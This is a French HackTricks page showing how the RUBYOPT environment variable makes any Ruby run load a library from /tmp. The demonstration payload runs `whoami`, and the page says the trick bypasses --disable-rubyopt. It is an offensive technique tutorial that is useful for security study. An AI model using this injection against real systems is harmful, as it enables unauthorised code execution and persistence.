HackTricksInjection d'applications Ruby sur macOS
Reading time: 2 minutes
tip
Apprenez et pratiquez le hacking AWS :
HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : 
HackTricks Training GCP Red Team Expert (GRTE)
Soutenir HackTricks
- Vérifiez les plans d'abonnement !
- Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez nous sur Twitter 🐦 @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PRs au HackTricks et HackTricks Cloud dépôts github.
RUBYOPT
En utilisant cette variable d'environnement, il est possible d'ajouter de nouveaux paramètres à ruby chaque fois qu'il est exécuté. Bien que le paramètre -e ne puisse pas être utilisé pour spécifier le code ruby à exécuter, il est possible d'utiliser les paramètres -I et -r pour ajouter un nouveau dossier au chemin de chargement des bibliothèques et ensuite spécifier une bibliothèque à charger.
Créez la bibliothèque inject.rb dans /tmp :
puts `whoami`
Créez n'importe où un script Ruby comme :
puts 'Hello, World!'
Ensuite, faites charger un script ruby arbitraire avec :
RUBYOPT="-I/tmp -rinject" ruby hello.rb
Fait amusant, cela fonctionne même avec le paramètre --disable-rubyopt :
RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
tip
Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE)
Soutenir HackTricks
- Vérifiez les plans d'abonnement !
- Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez nous sur Twitter 🐦 @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PRs au HackTricks et HackTricks Cloud dépôts github.